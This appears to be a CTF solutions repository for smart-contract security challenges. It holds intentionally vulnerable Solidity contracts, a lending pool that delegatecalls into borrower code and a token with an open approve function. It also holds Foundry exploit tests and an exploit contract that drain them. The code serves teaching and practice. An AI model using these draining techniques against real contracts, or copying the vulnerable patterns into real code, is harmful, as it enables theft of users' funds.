| Challenge | Note, Keywords |

| ------------------------------------------------------------------------ | ------------------------------------- |

| [Ethernaut: 15. Naught Coin](src/Ethernaut#15-naught-coin) | `transfer`, `approve`, `transferFrom` |

| [Paradigm CTF 2021: Secure](src/ParadigmCTF2021) | WETH |

| [DeFi-Security-Summit-Stanford: VToken](src/DeFiSecuritySummitStanford/) | |

| Challenge | Note, Keywords |

| -------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------- |

| [Ethernaut: 6. Delegation](src/Ethernaut#6-delegation) | |

| [Ethernaut: 16. Preservation](src/Ethernaut#16-preservation) | |

| [Ethernaut: 24. Puzzle Wallet](src/Ethernaut#24-puzzle-wallet) | proxy contract |

| [Ethernaut: 25. Motorbike](src/Ethernaut#25-motorbike) | proxy contract, [EIP-1967: Standard Proxy Storage Slots](https://eips.ethereum.org/EIPS/eip-1967) |

| [DeFi-Security-Summit-Stanford: InSecureumLenderPool](src/DeFiSecuritySummitStanford/) | flash loan |

pragma solidity 0.8.14;

import {IERC20} from "openzeppelin-contracts/contracts/token/ERC20/IERC20.sol";

import {Address} from "openzeppelin-contracts/contracts/utils/Address.sol";

import {SafeERC20} from "openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol";

contract InSecureumLenderPool {

using Address for address;

using SafeERC20 for IERC20;

/// @dev Token contract address to be used for lending.

//IERC20 immutable public token;

IERC20 public token;

/// @dev Internal balances of the pool for each user.

mapping(address => uint256) public balances;

// flag to notice contract is on a flashloan

bool private _flashLoan;

/// @param _token Address of the token to be used for the lending pool.

constructor(address _token) {

token = IERC20(_token);

}

/// @dev Deposit the given amount of tokens to the lending

/// pool. This will add _amount to balances[msg.sender] and

/// transfer _amount tokens to the lending pool.

/// @param _amount Amount of token to deposit in the lending pool

function deposit(uint256 _amount) external {

require(!_flashLoan, "Cannot deposit while flash loan is active");

token.safeTransferFrom(msg.sender, address(this), _amount);

balances[msg.sender] += _amount;

}

/// @dev Withdraw the given amount of tokens from the lending pool.

function withdraw(uint256 _amount) external {

require(!_flashLoan, "Cannot withdraw while flash loan is active");

balances[msg.sender] -= _amount;

token.safeTransfer(msg.sender, _amount);

}

/// @dev Give borrower all the tokens to make a flashloan.

/// For this with get the amount of tokens in the lending pool before, then we give

/// control to the borrower to make the flashloan. After the borrower makes the flashloan

/// we check if the lending pool has the same amount of tokens as before.

/// @param borrower The contract that will have access to the tokens

/// @param data Function call data to be used by the borrower contract.

function flashLoan(address borrower, bytes calldata data) external {

uint256 balanceBefore = token.balanceOf(address(this));

_flashLoan = true;

borrower.functionDelegateCall(data);

_flashLoan = false;

uint256 balanceAfter = token.balanceOf(address(this));

require(balanceAfter >= balanceBefore, "Flash loan hasn't been paid back");

}

}

pragma solidity ^0.8.14;

import "forge-std/Test.sol";

import "./InSecureumLenderPool.sol";

import "../tokens/tokenInsecureum.sol";

contract InSecureumLenderPoolExploitTest is Test {

address playerAddress = makeAddr("player");

function test() public {

ERC20 token = ERC20(address(new InSecureumToken(10 ether)));

InSecureumLenderPool target = new InSecureumLenderPool(address(token));

token.transfer(address(target), 10 ether);

vm.startPrank(playerAddress, playerAddress);

InSecureumLenderPoolExploit exploit = new InSecureumLenderPoolExploit();

target.flashLoan(address(exploit), "");

target.withdraw(10 ether);

vm.stopPrank();

assertEq(token.balanceOf(address(target)), 0, "contract must be empty");

}

}

import "forge-std/console.sol";

contract InSecureumLenderPoolExploit {

// $ forge inspect src/DeFiSecuritySummitStanford/InSecureumLenderPool/InSecureumLenderPool.sol:InSecureumLenderPool storage

bytes32 slot0;

mapping(address => uint256) public balances;

fallback() external {

balances[msg.sender] = 10 ether;

}

}

pragma solidity 0.8.14;

import {ERC20} from "openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";

contract VToken is ERC20 {

// Decimals are set to 18 by default in `ERC20`

constructor() ERC20("VToken", "VTLK") {

address vitalik = 0xd8dA6BF26964aF9D7eEd9e03E53415D37aA96045;

_mint(vitalik, 100 ether);

}

/**

function approve(address owner, address spender, uint256 amount) public returns (bool) {

_approve(owner, spender, amount);

return true;

}

}

pragma solidity ^0.8.14;

import "forge-std/Test.sol";

import "./VToken.sol";

contract VTokenExploitTest is Test {

address playerAddress = makeAddr("player");

address vitalikAddress = 0xd8dA6BF26964aF9D7eEd9e03E53415D37aA96045;

function test() public {

VToken vToken = new VToken();

vm.startPrank(playerAddress, playerAddress);

vToken.approve(vitalikAddress, playerAddress, type(uint256).max);

vToken.transferFrom(vitalikAddress, playerAddress, vToken.balanceOf(vitalikAddress));

vm.stopPrank();

assertEq(vToken.balanceOf(playerAddress), vToken.totalSupply(), "you must get all the tokens");

}

}

pragma solidity 0.8.14;

import {ERC20} from "openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";

contract BoringToken is ERC20 {

// Decimals are set to 18 by default in `ERC20`

constructor(uint256 _supply) ERC20("BoringToken", "BOR") {

_mint(msg.sender, _supply);

}

}

pragma solidity 0.8.14;

import {ERC20} from "openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";

import {Address} from "openzeppelin-contracts/contracts/utils/Address.sol";

contract SimpleERC223Token is ERC20 {

constructor(uint256 _supply) ERC20("Simple ERC223 Token", "SET") {

_mint(msg.sender, _supply);

}

function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual override {

// Call parent hook

super._afterTokenTransfer(from, to, amount);

if (Address.isContract(to)) {

// this is wrong and broken on many ways, but it works for this example

// instead of a try catch perhaps we should use a ERC165...

// the tokenFallback function is run if the contract has this function

(bool success,) =

to.call(abi.encodeWithSignature("tokenFallback(address,uint256,bytes)", msg.sender, amount, ""));

require(success, "TokenFallback not implemented");

}

}

}

pragma solidity 0.8.14;

import {ERC20} from "openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";

contract InSecureumToken is ERC20 {

// Decimals are set to 18 by default in `ERC20`

constructor(uint256 _supply) ERC20("InSecureumToken", "ISEC") {

_mint(msg.sender, _supply);

}

}